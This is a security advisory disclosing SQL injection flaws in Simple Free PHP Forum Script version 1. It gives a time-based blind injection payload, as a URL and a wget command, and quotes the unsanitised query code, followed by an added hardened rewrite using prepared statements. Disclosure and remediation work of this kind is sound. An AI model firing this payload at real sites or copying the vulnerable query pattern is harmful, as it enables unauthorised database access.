Simple Free PHP Forum Script versions 1 and below suffer from multiple remote SQL injection vulnerabilities.
# Exploit Title: Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability
# Date: 2011-10-19
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: https://www.phpforumscript.com/?page_id=11
# Version: 1 (tested)
This script is riddled with unsanitized REQUEST variables that allow multiple SQL injections.
--------------
PoC
--------------
https://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1
wget "https://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1"
--------------
Vulnerable Code
--------------
Line 150 of discussion.php:
case 'cat':
$get_id=$_REQUEST["id"]; // taken straight from GET/POST/COOKIE, no validation or escaping
$page->Set("cat_id",$get_id);
$query="SELECT * FROM discussion_category WHERE id='$get_id' LIMIT 1"; // raw value interpolated into the SQL string
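A hardened form of the same `cat` case, added here as an example and not code from the original script or from the advisory author. It assumes `$db` is an open mysqli connection and `$page` is the script's own template object; it also reads the id from GET only rather than `$_REQUEST`, which is a deliberate narrowing of the original's input source.

```php
<?php
// Added example: the 'cat' case rewritten so request data is never
// interpolated into SQL. Assumes $db (mysqli) and $page come from the
// original application; get_result() requires the mysqlnd driver.

function load_category(mysqli $db, $page): ?array
{
    // Category ids are positive integers; reject anything else before
    // it ever reaches the database layer.
    $get_id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    if ($get_id === false || $get_id === null) {
        http_response_code(400);
        return null;
    }

    // Parameterised query: the id is sent as a bound integer value,
    // not as SQL text, so quotes, boolean conditions or time-consuming
    // functions supplied in the parameter cannot alter the statement.
    $stmt = $db->prepare(
        'SELECT * FROM discussion_category WHERE id = ? LIMIT 1'
    );
    $stmt->bind_param('i', $get_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return null; // unknown category; caller renders a not-found page
    }
    $page->Set('cat_id', $get_id);
    return $row;
}
```

With this version, the PoC request above fails integer validation and is answered with HTTP 400 before any query runs, which also makes such attempts easy to spot in the web server's access log.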